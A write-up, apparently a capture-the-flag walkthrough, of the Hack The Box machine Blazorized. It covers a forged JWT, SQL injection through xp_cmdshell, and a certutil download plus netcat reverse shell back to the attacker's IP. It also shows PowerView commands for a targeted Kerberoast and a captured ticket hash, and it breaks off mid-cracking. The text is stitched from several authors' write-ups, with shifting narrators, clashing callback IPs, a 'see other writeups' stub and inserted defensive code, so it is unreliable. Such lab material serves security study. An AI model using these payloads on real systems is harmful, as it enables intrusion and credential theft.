
Blazorized

Blazorized is a Windows-focused box, starting with a website written using the Blazor .NET framework. I’ll reverse a DLL that the server sends to the browser to find a JWT secret and use it to get access to the admin panel. There I’ll abuse SQL injection to get execution and a shell. To pivot to the next user, I’ll abuse the WriteSPN privilege to perform a targeted Kerberoast attack. Then I’ll abuse permissions to write another user’s login script. Finally, I’ll abuse the GetChangesAll permission with Mimikatz to dump the hashes for the domain and get a shell as administrator.

Recon

nmap

nmap finds many open TCP ports indicative of a Windows active directory domain controller:

└─$ nmap -sC -sV 10.10.11.22 -oN blazorized.nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-24 13:09 CEST
Nmap scan report for blazorized.htb (10.10.11.22)
Host is up (0.010s latency).
Not shown: 986 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Mozhar's Digital Garden
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-24 11:09:07Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server 2022 16.00.1115.00; RTM+
| ms-sql-ntlm-info: 
|   10.10.11.22\BLAZORIZED: 
|     Target_Name: BLAZORIZED
|     NetBIOS_Domain_Name: BLAZORIZED
|     NetBIOS_Computer_Name: DC1
|     DNS_Domain_Name: blazorized.htb
|     DNS_Computer_Name: DC1.blazorized.htb
|     DNS_Tree_Name: blazorized.htb
|_    Product_Version: 10.0.17763
|_ssl-date: 2025-04-24T11:09:16+00:00; 0s from scanner time.
| ms-sql-info: 
|   10.10.11.22\BLAZORIZED: 
|     Instance name: BLAZORIZED
|     Version: 
|       name: Microsoft SQL Server 2022 RTM+
|       number: 16.00.1115.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: true
|     TCP port: 1433
|_    Clustered: false
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-04-24T11:08:25
|_Not valid after:  2055-04-24T11:08:25
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-04-24T11:09:11
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.77 seconds

In addition to the typical DC ports (DNS on 53, Kerberos on 88, RPC on 135, netbios on 139, SMB on 445, LDAP on 389 and several others), there’s also a webserver on 80, MSSQL on 1433, and WinRM on 5985.

nmap also identifies a hostname, DC1.

The webserver is redirecting to blazorized.htb, indicating virtual host-based routing.

Subdomain Fuzz

Given the use of host-based routing, I’ll use ffuf to brute force any subdomains of blazorized.htb that respond differently:

puck@kali$ ffuf -u http://10.10.11.22 -H "Host: FUZZ.blazorized.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -ac


admin                   [Status: 200, Size: 2077, Words: 149, Lines: 28, Duration: 107ms]
:: Progress: [19966/19966] :: Job [1/1] :: 466 req/sec :: Duration: [0:00:43] :: Errors: 0 ::

It finds admin.blazorized.htb. I’ll add it to my /etc/hosts file, along with the hostname:

10.10.11.22 blazorized.htb admin.blazorized.htb dc1.blazorized.htb

SMB – TCP 445

netexec confirms the domain and hostname:

puck@kali$ netexec smb blazorized.htb
SMB         10.10.11.22     445    DC1              [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC1) (domain:blazorized.htb) (signing:True) (SMBv1:False)

I’m not able to access any share information anonymously:

puck@kali$ netexec smb blazorized.htb --shares
SMB         10.10.11.22     445    DC1              [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC1) (domain:blazorized.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.22     445    DC1              [-] IndexError: list index out of range
SMB         10.10.11.22     445    DC1              [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
puck@kali$ netexec smb blazorized.htb -u guest -p '' --shares
SMB         10.10.11.22     445    DC1              [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC1) (domain:blazorized.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.22     445    DC1              [-] blazorized.htb\guest: STATUS_ACCOUNT_DISABLED 
puck@kali$ netexec smb blazorized.htb -u puck -p '' --shares
SMB         10.10.11.22     445    DC1              [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC1) (domain:blazorized.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.22     445    DC1              [-] blazorized.htb\puck: STATUS_LOGON_FAILURE 

blazorized.htb – TCP 80

Site

The site is a personal “digital garden”.

The “Check for Updates” page has an interesting button describing the API:

Clicking it doesn’t do anything, but in the background I can see requests for api.blazorized.htb:

On adding that to my hosts file, it runs and three new items are added to the menu:

These have short blog posts about programming and technical fields:

See other writeups .. for more

If we run it, the script generates a token:

❯ python3 generate_JWT_token.py

eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjoiU3VwZXJfQWRtaW4iLCJpc3MiOiJodHRwOi8vYXBpLmJsYXpvcml6ZWQuaHRiIiwiYXVkIjoiaHR0cDovL2FkbWluLmJsYXpvcml6ZWQuaHRiIiwiZXhwIjoxNzIxNjIyMTkyfQ.odLhTL_xCynUd24s78wRnyg18N1D9wF2F5jmyCBqgs8WJ3-BfhfHPrqO4h2OqFyjlFBjDy0xUX37y0dLELdefA

To check that this worked, we can decode the JWT at https://jwt.io/.


Let’s go on. The “audience” (aud) claim in a JWT names the recipients the token is intended for, and a relying party uses it to make sure it only accepts tokens meant for itself; in this case the audience is http://admin.blazorized.htb. From that we assume the generated token is useful for the http://admin.blazorized.htb site found earlier. Note also that the token is only valid for 60 seconds (set by the expiration_duration_in_seconds variable in the script), so once generated we have one minute to use it. If it doesn’t work, we must generate a new token.

(Another option would be to raise the token expiration in the script from 60 to a much higher value, but I honestly didn’t try it. I leave it as a task for the reader.)
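The checks the 60-second window and the aud claim imply, as an added example (not the page’s generate_JWT_token.py and not the project’s code): it decodes the token printed above the way jwt.io does, and shows the signature, iss, aud and exp validation a relying party such as admin.blazorized.htb must perform. The HS512 secret used for minting is a constructed placeholder; the real one comes from the reversed DLL.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# Token printed by generate_JWT_token.py on the page. It can be decoded here but
# not verified: the real HS512 secret is in the reversed DLL, not in this example.
PAGE_TOKEN = (
    "eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9."
    "eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjoiU3VwZXJfQWRtaW4iLCJpc3MiOiJodHRwOi8vYXBpLmJsYXpvcml6ZWQuaHRiIiwiYXVkIjoiaHR0cDovL2FkbWluLmJsYXpvcml6ZWQuaHRiIiwiZXhwIjoxNzIxNjIyMTkyfQ."
    "odLhTL_xCynUd24s78wRnyg18N1D9wF2F5jmyCBqgs8WJ3-BfhfHPrqO4h2OqFyjlFBjDy0xUX37y0dLELdefA"
)

ISSUER = "http://api.blazorized.htb"
AUDIENCE = "http://admin.blazorized.htb"
LIFETIME_SECONDS = 60  # same as expiration_duration_in_seconds in the page's script


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    # JWT segments drop the '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def peek(token: str):
    """Split a JWT into (header, claims) WITHOUT checking the signature.

    This is what jwt.io shows; it proves nothing about who minted the token."""
    header_b64, claims_b64, _sig = token.split(".")
    return (json.loads(_b64url_decode(header_b64)),
            json.loads(_b64url_decode(claims_b64)))


def mint_token(secret: bytes, claims: dict, now: int,
               lifetime: int = LIFETIME_SECONDS) -> str:
    """Build an HS512 token the way the page's script does: iss, aud, short exp."""
    header = {"alg": "HS512", "typ": "JWT"}
    body = dict(claims, iss=ISSUER, aud=AUDIENCE, exp=now + lifetime)
    signing_input = (_b64url_encode(json.dumps(header, separators=(",", ":")).encode())
                     + "." +
                     _b64url_encode(json.dumps(body, separators=(",", ":")).encode()))
    sig = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha512).digest()
    return signing_input + "." + _b64url_encode(sig)


def verify_token(token: str, secret: bytes, expected_aud: str = AUDIENCE,
                 now: Optional[int] = None) -> dict:
    """The checks a relying party must make; raises ValueError on any failure."""
    now = int(time.time()) if now is None else now
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, claims_b64, sig_b64 = parts
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") != "HS512":  # pin the algorithm; never trust the token's choice
        raise ValueError("unexpected alg %r" % header.get("alg"))
    expected = hmac.new(secret, (header_b64 + "." + claims_b64).encode("ascii"),
                        hashlib.sha512).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    claims = json.loads(_b64url_decode(claims_b64))
    if claims.get("iss") != ISSUER:
        raise ValueError("wrong issuer")
    if claims.get("aud") != expected_aud:  # the aud check discussed above
        raise ValueError("token not intended for this audience")
    if "exp" not in claims or now >= int(claims["exp"]):  # the 60-second window
        raise ValueError("token expired")
    return claims


if __name__ == "__main__":
    hdr, body = peek(PAGE_TOKEN)
    print("page token:", hdr["alg"], body["aud"], "exp", body["exp"])
    placeholder_secret = b"placeholder-secret-not-the-real-one"  # constructed
    tok = mint_token(placeholder_secret, {"role": "Super_Admin"}, now=int(time.time()))
    print("fresh token accepted:", verify_token(tok, placeholder_secret)["aud"])
```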

After generating the token, open http://admin.blazorized.htb in a browser such as Firefox. Then open the developer tools (Ctrl + Shift + I), go to Storage, then Local Storage, and add a new entry by clicking the + symbol. As the key I put jwt, and as the value I put the JWT generated by our Python script:


We reload the page and we’re inside:

On the left side of the page there is a search tool under “Check Duplicate Post Titles”. Clicking on it shows:


Remember that this machine is running a Microsoft SQL Server (MSSQL) service, so this search tool may be querying that service.

After trying many things, and since a SQL database is in use, we tried some SQL injections. To see the result, we started a listener for ICMP traffic on our attacker machine using tcpdump:

❯ sudo tcpdump -ni tun0 icmp

Finally, one of the injections works (based on the PayloadsAllTheThings payloads):

';exec master..xp_cmdshell "ping -n 1 10.10.14.5" --+


And we get something in our listener:

❯ sudo tcpdump -ni tun0 icmp

tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
00:52:11.744937 IP 10.10.11.22 > 10.10.16.3: ICMP echo request, id 1, seq 415, length 40
00:52:11.744948 IP 10.10.16.3 > 10.10.11.22: ICMP echo reply, id 1, seq 415, length 40

We have remote command execution.

Therefore, to get a reverse shell, we will transfer a netcat binary for Windows to the victim machine. First, we start a temporary Python HTTP server on port 8000 on our attacker machine by running:

❯ ls && python3 -m http.server 8000

generate_JWT_token.py  nc64.exe
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

We use the certutil tool on the victim machine by submitting the following injection in the search field:

';exec master..xp_cmdshell "C:\Windows\System32\cmd.exe /c certutil.exe -urlcache -split -f http://10.10.14.5:8000/nc64.exe C:\Users\Public\Downloads\nc.exe" --+

where 10.10.14.5 is our attacker’s IP.

Then, on our attacker machine, we start a netcat listener on port 443, wrapped in rlwrap:

❯ rlwrap -cAr nc -lvnp 443

listening on [any] 443 ...

Finally, we run the transferred netcat binary to send us a reverse shell by injecting the command:

';exec master..xp_cmdshell "C:\Users\Public\Downloads\nc.exe 10.10.14.5 443 -e C:\Windows\System32\cmd.exe" --+

and we get a shell as the user nu_1055:

❯ rlwrap -cAr nc -lvnp 443

listening on [any] 443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.11.22] 60850
Microsoft Windows [Version 10.0.17763.5936]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami

whoami
blazorized\nu_1055

We can read the user flag in this user’s Desktop directory.


Shell

To get a shell, I’ll grab the PowerShell #3 (Base64) payload from revshells.com and replace ping 10.10.14.6 with that in the form:

On sending, I get a shell as nu_1055 at nc:

puck@kali$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.22 49828

PS C:\Windows\system32> whoami
blazorized\nu_1055

I’ll find user.txt on the desktop:

PS C:\users\nu_1055\desktop> type user.txt
6c6560db************************

Shell as rsa_4810

Enumeration

Home Directories

There are three non-admin users with home directories on Blazorized:

PS C:\users> ls

    Directory: C:\users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/2/2024   4:13 PM                Administrator
d-----        2/25/2024   2:41 PM                NU_1055
d-r---        10/6/2021   3:46 PM                Public
d-----         2/1/2024   8:36 AM                RSA_4810
d-----        6/19/2024   8:39 AM                SSA_6010  

nu_1055 can’t access anyone else’s, and there’s nothing interesting in their home directory.

Web Data

The IIS web directories are in \inetpub:

PS C:\inetpub> ls

    Directory: C:\inetpub

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/9/2024   5:17 AM                custerr
d-----        6/27/2024   8:05 AM                history
d-----         1/9/2024   5:17 AM                logs
d-----         1/9/2024   5:18 AM                temp
d-----        1/18/2024   2:00 PM                wwwroot  

In wwwroot there’s a folder for each domain, as well as the web.config file that handles the virtual host-based routing:

PS C:\inetpub\wwwroot> ls

    Directory: C:\inetpub\wwwroot

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        1/21/2024   4:44 PM                Blazorized.API
d-----        2/25/2024   7:26 AM                Blazorized.DigitalGarden
d-----        2/25/2024   7:38 AM                Blazorized.DigitalGardenAdmin
-a----         1/9/2024   5:17 AM            703 iisstart.htm
-a----         1/9/2024   5:17 AM          99710 iisstart.png
-a----        1/18/2024   2:13 PM            583 web.config

The web applications are a series of compiled .NET assemblies (.dll). I can come back and look at them if I need to, but I won’t need to in this case.

Other File System

The root of the C:\ drive has a couple interesting directories:

PS C:\> ls

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/9/2024   5:17 AM                inetpub
d-----         2/1/2024   6:24 AM                Microsoft
d-----        2/25/2022  10:20 AM                PerfLogs
d-r---        6/21/2024   9:02 AM                Program Files
d-----         2/1/2024   4:34 AM                Program Files (x86)
d-----        1/16/2024   7:23 PM                SQL2022
d-----        6/19/2024  11:45 AM                Temp
d-r---        6/20/2024   7:28 AM                Users
d-----        6/21/2024   9:40 AM                Windows   

Microsoft has a file at C:\Microsoft\Windows\PowerShell\StartupProfileData-Interactive. This file shows up when PowerShell is run in an odd way, but isn’t interesting as far as exploiting the box.

SQL2022 is empty.

Bloodhound

Setup

I’m using the newer Bloodhound-CE, which runs really nicely as a Docker container. I’ll set it up with a curl command into docker compose:

puck@hkali$ curl -L https://ghst.ly/getbhce | BLOODHOUND_PORT=8888 docker compose -f - up
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   156  100   156    0     0    335      0 --:--:-- --:--:-- --:--:--   335
100  3784  100  3784    0     0   4615      0 --:--:-- --:--:-- --:--:--  4615
[+] Running 1/0
 ✔ Container blazorized-10101122-app-db-1  Running                                                                                                                                                                                       0.0s
Attaching to app-db-1, bloodhound-1, graph-db-1
graph-db-1    | Changed password for user 'neo4j'. IMPORTANT: this change will only take effect if performed before the database is started for the first time.
graph-db-1    | 2024-11-01 11:00:44.324+0000 INFO  Starting...
graph-db-1    | 2024-11-01 11:00:44.616+0000 INFO  This instance is ServerId{e9b76907} (e9b76907-bc64-4830-b858-eeb2203107ce)
graph-db-1    | 2024-11-01 11:00:45.407+0000 INFO  ======== Neo4j 4.4.38 ========
graph-db-1    | 2024-11-01 11:00:47.121+0000 INFO  Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
graph-db-1    | 2024-11-01 11:00:47.129+0000 INFO  Setting up initial user from `auth.ini` file: neo4j
graph-db-1    | 2024-11-01 11:00:47.129+0000 INFO  Creating new user 'neo4j' (passwordChangeRequired=false, suspended=false)
graph-db-1    | 2024-11-01 11:00:47.147+0000 INFO  Setting version for 'security-users' to 3
...[snip]...

This is the same command in the documentation except I added BLOODHOUND_PORT=8888 as by default it wants to run the webserver on 8080 where I have Burp already listening.

With only a shell and no creds for the box, I’ll need to collect Bloodhound data using something running on Blazorized. I’ve got SharpHound.exe from the above, which I’ll upload to Blazorized and run:

PS C:\programdata> wget http://10.10.14.6/SharpHound.exe -outfile SharpHound.exe
PS C:\programdata> .\SharpHound.exe -c all
2024-11-01T06:09:19.7721017-05:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2024-11-01T06:09:20.0220952-05:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2024-11-01T06:09:20.0689718-05:00|INFORMATION|Initializing SharpHound at 6:09 AM on 11/1/2024
2024-11-01T06:09:20.1158490-05:00|INFORMATION|Resolved current domain to blazorized.htb
2024-11-01T06:09:20.2564704-05:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2024-11-01T06:09:20.3970940-05:00|INFORMATION|Beginning LDAP search for blazorized.htb
2024-11-01T06:09:20.5064724-05:00|INFORMATION|Beginning LDAP search for blazorized.htb Configuration NC
2024-11-01T06:09:20.5377221-05:00|INFORMATION|Producer has finished, closing LDAP channel
2024-11-01T06:09:20.5377221-05:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-11-01T06:09:20.5845970-05:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for BLAZORIZED.HTB
2024-11-01T06:09:20.5845970-05:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for BLAZORIZED.HTB
2024-11-01T06:09:20.9283450-05:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for BLAZORIZED.HTB
2024-11-01T06:09:21.4908447-05:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2024-11-01T06:09:21.5220984-05:00|INFORMATION|Output channel closed, waiting for output task to complete
2024-11-01T06:09:21.6627215-05:00|INFORMATION|Status: 313 objects finished (+313 313)/s -- Using 37 MB RAM
2024-11-01T06:09:21.6627215-05:00|INFORMATION|Enumeration finished in 00:00:01.2861155
2024-11-01T06:09:21.7877405-05:00|INFORMATION|Saving cache with stats: 20 ID to type mappings.
 2 name to SID mappings.
 1 machine sid mappings.
 4 sid to domain mappings.
 0 global catalog mappings.
2024-11-01T06:09:21.8346081-05:00|INFORMATION|SharpHound Enumeration Completed at 6:09 AM on 11/1/2024! Happy Graphing!

The output is a zip archive:

PS C:\programdata> ls *.zip

    Directory: C:\programdata

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        11/1/2024   6:09 AM          26090 20241101060921_BloodHound.zip

I’ll start smbserver.py on my host creating a share named share:

oxdf@hacky$ smbserver.py share . -smb2support -username oxdf -password oxdf
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies 

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed

I’ll connect to the share from Blazorized and exfil the collection:

PS C:\programdata> net use \\10.10.14.6 /u:oxdf oxdf
The command completed successfully.
PS C:\programdata> copy *.zip \\10.10.14.6\share\

Bloodhound Targeted Kerberoast


Analysis

I’ll click “Explore” and get to the Bloodhound window. I’ll start by finding the user I own, nu_1055, and marking them as owned. The first thing I always look at is “Outbound Object Control”:


Targeted Kerberoast Background

A Service Principal Name (SPN) is a unique identifier that associates a service instance with a service account in Kerberos.

Kerberoasting is an attack where an authenticated user requests a ticket for a service by its SPN, and the ticket that comes back is encrypted with a key derived from the password of the user associated with that service. If that password is weak, it can be cracked offline by brute force.

To perform a targeted kerberoast, I’ll assign an SPN to the RSA_4810 account. Then I can request a ticket as that fake service, and get a ticket encrypted with RSA_4810’s password to crack.

The full process for performing this attack from Windows is given in the “Windows Abuse” section of the right hand panel in Bloodhound when I click on WriteSPN:
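The sequence described above seen from the defender’s side, as an added example that is not part of the original writeup: an SPN written onto a user object (Security event 5136) followed by an RC4 service ticket request for that account (event 4769, encryption type 0x17, which is the etype 23 in the $krb5tgs$23$ hash format). The events are constructed and shaped like a SIEM’s normalisation of those log entries; only the account names and the fake SPN are taken from the page, everything else is made up.

```python
from datetime import datetime, timedelta

# Constructed events (not real log data), normalised as key/value records.
EVENTS = [
    # WriteSPN abuse: a servicePrincipalName value is added on the RSA_4810 user object.
    {"ts": "2024-11-01T06:20:01", "id": 5136, "subject": "BLAZORIZED\\NU_1055",
     "object": "CN=RSA_4810,CN=Users,DC=blazorized,DC=htb", "object_class": "user",
     "attribute": "servicePrincipalName", "operation": "Value Added",
     "value": "nonexistent/BLAHBLAH"},
    # ...followed by a service ticket request for that account with RC4 (0x17 = etype 23).
    {"ts": "2024-11-01T06:20:04", "id": 4769, "subject": "NU_1055@BLAZORIZED.HTB",
     "service_name": "RSA_4810", "etype": "0x17", "client": "10.10.11.22"},
    # Normal traffic: an AES256 (0x12) ticket for the DC's computer account. Not flagged.
    {"ts": "2024-11-01T06:21:10", "id": 4769, "subject": "NU_1055@BLAZORIZED.HTB",
     "service_name": "DC1$", "etype": "0x12", "client": "10.10.11.22"},
    # RC4 ticket for a constructed user account that already had an SPN: plain Kerberoast.
    {"ts": "2024-11-01T06:25:00", "id": 4769, "subject": "NU_1055@BLAZORIZED.HTB",
     "service_name": "svc_constructed", "etype": "0x17", "client": "10.10.11.22"},
]

# RC4-HMAC tickets are keyed by the account's NT hash and crack quickly (hashcat 13100).
# Enforcing AES-only on service accounts removes this mode entirely.
RC4_ETYPES = {"0x17"}
SYSTEM_ACCOUNTS = {"KRBTGT"}


def first_rdn(dn: str) -> str:
    """'CN=RSA_4810,CN=Users,DC=blazorized,DC=htb' -> 'RSA_4810'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def is_user_service(name: str) -> bool:
    """Computer accounts ($) and krbtgt are expected ticket targets; user accounts are not."""
    upper = name.upper()
    return not upper.endswith("$") and upper not in SYSTEM_ACCOUNTS


def detect(events, window: timedelta = timedelta(hours=1)):
    """Return alerts: 'high' when an RC4 TGS request follows a fresh SPN write on that user,
    'medium' for any RC4 service ticket issued for a user account."""
    spn_writes = {}  # account (upper-cased) -> list of 5136 events that added an SPN
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if (ev["id"] == 5136 and ev.get("object_class") == "user"
                and ev.get("attribute", "").lower() == "serviceprincipalname"
                and ev.get("operation") == "Value Added"):
            spn_writes.setdefault(first_rdn(ev["object"]).upper(), []).append(ev)
        elif (ev["id"] == 4769 and ev.get("etype") in RC4_ETYPES
                and is_user_service(ev["service_name"])):
            target = ev["service_name"].upper()
            t = datetime.fromisoformat(ev["ts"])
            recent = [w for w in spn_writes.get(target, [])
                      if timedelta(0) <= t - datetime.fromisoformat(w["ts"]) <= window]
            if recent:
                w = recent[-1]
                alerts.append({"severity": "high", "rule": "targeted_kerberoast",
                               "target": target, "actor": ev["subject"],
                               "spn_writer": w["subject"], "spn": w["value"], "ts": ev["ts"]})
            else:
                alerts.append({"severity": "medium", "rule": "kerberoast_rc4_user_spn",
                               "target": target, "actor": ev["subject"], "ts": ev["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```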



Exploit

I’ll need PowerView to run the commands above. I’ll download it to my host, serve it with Python, and upload it to Blazorized. Next I’ll import it:

PS C:\programdata> . .\PowerView.ps1

Now I’ll set the SPN on the user:

PS C:\programdata> Set-DomainObject -Identity RSA_4810 -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}

or, with the ActiveDirectory module:

PS C:\programdata> Set-ADUser -Identity RSA_4810 -Add @{ServicePrincipalName='nonexistent/BLAHBLAH'}

And get a ticket, outputting the hash:

PS C:\programdata> Get-DomainUSer RSA_4810 | Get-DomainSPNTicket | Select-Object -ExpandProperty Hash
$krb5tgs$23$*RSA_4810$blazorized.htb$nonexistent/BLAHBLAH*$5AB431F9A16255580AC64A945C3EE2EF$AE1E3FA9D3DD4523FC011F824BEAF1ADD4B48765084C51B09AE51B988B33ADE938DCCA763FD88D3DA29D0666A0198A105921ED200782D01241117A7222C98C9717FBAEADB79DF75811F45F769CDB1F80E8A2EA73999CB894BB7CC833F7DFE752A9F61684FB39AB3E9ADA2609EB336635D7050C9A68881A8018FF5941CCFA7FE381C272CFAD3901588AA892490D2A59E3E4C4056E811AAA2E8200C686156BB78202FAC986A8C9799FC7DA0E4AF126154234420697B65115DC3116DD3958A6AF6206D483A572CC368428F8B38FB00BA17BBAB46D3CE277DB8A14D51B3AE92F8D41632EC88139A13D6A2FBD08417BC74C21ADE120E7226620A2499E98EAAF308E5EAF3430E6D82713DF5754DEA62857885455DBD482A174406DBF03681EC41AB964F6E88F77139DD0DBDD132F5F785C9BD3FD6A14D441F25380643D0B14EF8052CB89EC19244530868D3EFF7549B190319020066C31E39BE34D6481E4B4949AE8F4441AC55A0F0E35454CD82ACE715D40AA632B19B24E308571CE6AF5AB3F22CFF75792F22B07F13D6A5B65318A2C6C0FF05D193A5BB51ADF3D7568BF544960A476A62E25CBE1E88B5218479A41CB7860AE2DA50D5094F706A702C85A9290C06C7EF2E7CBC2EE40600516A5BD3933613D5154A810D47799E5BD9B3AC80DC5F3CC69128580E7F74563817AF617344533E241F310E0D42F7D057535D40481A620EE28E7E0425B860925A1C69C16B533C4D7512D2B028B5EC9A04157E3852EE934D3CFA9B88F8C4EEAF31B42350E51F10F745E9CC1AFBB1FA2D91BFAF6FB149E93BAF4E06CB9D942A3B78BD13FC2D7A5833D5B901DD197A017EB400F9434833BBA097C0D09F17B35EC84A685276C14CA6FBB5CF361B7810E1B8832FC1F2CBFF50A0E5396052957CE1D38D9C23D05733C1145A3FCFC83F077BF49BE812406246E09E23B0C85ED8C5AFD4137E9643B21F85DF26CBEE0073DD9DDA3D17178654BC8DFFEE39F1F70B48FDA4029A67B6A96AD95E6ABEDB107ED255AC8B4DB45B19296B5905FF3126C50567BDEB6825AE6CD56D9F65133EF8BB0A8C0130878E4F9EB78401D33E9462F9370AB2D3486721A0C3FB38963E166C37F69992A96C6004CBD65D08ACF9B3225EED3A753A14DB6B7D3A7547E8075E56AD5D9CAC891F907F17D0B2E1B87225A5C56B72CC67E9A161A51B60F7DF2DE55CC70D5C7B940386BBD0BFA4079F1F81FEE7B90482B307F819506028910C511890D9897BCFE96BE0FB76DD45D125A773739CA0B6A0EE76945237D8B12ECA112D43F639D690113C6681033CC62A9BAE235A1865C18C170FB3F534EF44E4BD111EF651501AAA168DD58
E2F109009A0A51BEF25F96747CF60C1B32696E1F885FF90504C05E24A93A2616DE3DDACE2D2DF46DEBF36DA4BE7F1A972AD48D71863BBB35A3793683380FB61DFF44F36846A2B3EC21635CFAF9D82B23D36EC546344652FFC875D8B2E1805BECCECE6839BAAD3A58D16617F4039108C21AC3622724DEF43B68776C33CC05B5082C807C14D2350FD3BEBD62C59F6C1510D95EE441D32749696195B71D8E34AE8C90D1C7BC1FD6B2D786A72E08858E20F98483C6ECB853B2D3F6782C4BB2DB433B43E623FCFCB8B0A8ABB2D2B929A3AA6EEE6E40C950D51E9F2E9C6C7DFDED56D24D68F67A3F21AC19DA0C9450F9EB53DE59B18A9981892AD2EC9CA38D825FC26F64A4B31A0D677D9509D3DFA3B33EE4106D7AD40E02C08C97513298C1298C1414EF6BF6198335C2709CD1C5BB597F

Crack Hash

I’ll save that hash to a file on my host and pass it to hashcat:

$ hashcat rsa_4810.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt 
hashcat (v6.2.6) starting in autodetect mode
...[snip]...
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
